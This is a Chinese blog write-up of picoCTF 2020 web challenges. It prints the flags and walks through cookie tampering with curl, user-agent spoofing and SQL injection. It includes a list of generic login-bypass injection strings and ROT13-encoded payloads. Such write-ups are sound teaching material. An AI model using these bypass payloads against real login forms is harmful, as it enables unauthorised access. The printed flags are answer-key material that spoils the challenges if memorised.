picoCTF2020_Web

最新推荐文章于 2024-05-13 16:47:31 发布

煤矿路口西_CTF小学生

最新推荐文章于 2024-05-13 16:47:31 发布

阅读量860

点赞数 1

CC 4.0 BY-SA版权

分类专栏：打卡日常文章标签：信息安全 web

本文链接：https://blog.youkuaiyun.com/LLKJSAF/article/details/109632243

打卡日常专栏收录该内容

40 篇文章

订阅专栏

本文介绍了picoCTF2020网络安全竞赛中的Web Exploitation部分，涉及通过查看源码获取部分flag、利用/robots.txt找到隐藏页面、操控客户端状态、命令行参数传递、修改用户代理以及解决过滤和加密问题来解密flag的方法。通过这些挑战，作者学习了Web安全和绕过策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

picoCTF

Web Exploitation

Insp3ct0r

Insp3ct0r

How do you inspect web code on a browser?There’s 3 parts

ctrl+u看源码->1/3 of the flag: picoCTF{tru3_d3

mycss.css看源码-> 2/3 of the flag: t3ct1ve_0r_ju5t

myjs.js看源码->3/3 of the flag: _lucky?2e7b23e3}

where are the robots

where are the robots

What part of the website could tell you where the creator doesn’t want you to look?

提到robots,输入/robots.txt

得👇

User-agent: *
Disallow: /1bb4c.html

输入/1bb4c.html
得flag.

dont-use-client-side

dont-use-client-side

Never trust the client

看源码

function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(0, split) == 'pico') {
      if (checkpass.substring(split*6, split*7) == '706c') {
        if (checkpass.substring(split, split*2) == 'CTF{') {
         if (checkpass.substring(split*4, split*5) == 'ts_p') {
          if (checkpass.substring(split*3, split*4) == 'lien') {
            if (checkpass.substring(split*5, split*6) == 'lz_b') {
              if (checkpass.substring(split*2, split*3) == 'no_c') {
                if (checkpass.substring(split*7, split*8) == '5}') {
                  alert("Password Verified")
                  }
                }
              }
      
            }
          }
        }
      }
    }
    else {
      alert("Incorrect password");
    }
    
  }

读代码，根据下标拼接flag。

logon

logon

Hmm it doesn’t seem to check anyone’s password, except for logon’s?

根据提示，用logon登录后，什么都没有。但EditThisCookie中观察，多了admin的选项，将admin由False改为True后，加锁，加路径后，刷新即可得flag。👇

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kXHZ7lsJ-1605102642158)(/temp/pico/web1.jpg)]

Client-side-again

命令行传参

Client-side-again

What is obfuscation?

Open-to-admins

Open-to-admins

Can cookies help you to get the flag?

了解了传COOKIES的另一种方式：

curl "https://jupiter.challenges.picoctf.org/problem/51400/" -H "Cookie:admin=True;time=1400;" -s

以及

grep picoCTF

来搜索关键词。

picobrowser

更换用户代理

picobrowser

You don’t need to download a new web browser

curl --user-agent "picobrowser" "https://jupiter.challenges.picoctf.org/problem/13759/flag" | grep picoCTF

得flag所在的那一行。

Irish-Name-Repo 1

Irish-Name-Repo 1

There doesn’t seem to be many ways to interact with this. I wonder if the users are kept in a database?Try to think about how the website verifies your login.

由这道题了解到了网络后台的万能密码，

"or "a"="a

')or('a'='a

or 1=1--

'or 1=1--

a'or' 1=1--

"or 1=1--

'or'a'='a

"or"="a'='a

'or''='

'or'='or'

1 or '1'='1'=1

1 or '1'='1' or 1=1

'OR 1=1

"or 1=1

'xor

简单来说就是在自己需要传输的命令后添加一个恒为真的值来保证执行。学到了。
由此可知该题可输入的命令为

debug=1&password=&username=admin' or '1'=='1

username: admin' or '1'=='1
password: 
SQL query: SELECT * FROM users WHERE name='admin' or '1'=='1' AND password=''

得到flag.

Irish-Name-Repo 2

Irish-Name-Repo 2

The password is being filtered.

debug=1&password=1&username=admin'--

username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'

Irish-Name-Repo 3

Irish-Name-Repo 3

Seems like the password is encrypted.

尝试

debug=1&password=adsf

发现回显

password: adsf
SQL query: SELECT * FROM admin where password = 'nqfs'

与输入不同，可知该程序对输入值进行了某种加密。观察可得为ROT13解码，故我们可以通过ROT13加密的方式传入我们的命令。

debug=1&password=' BE '1'='1

得

password: ' BE '1'='1
SQL query: SELECT * FROM admin where password = '' OR '1'='1'

得flag.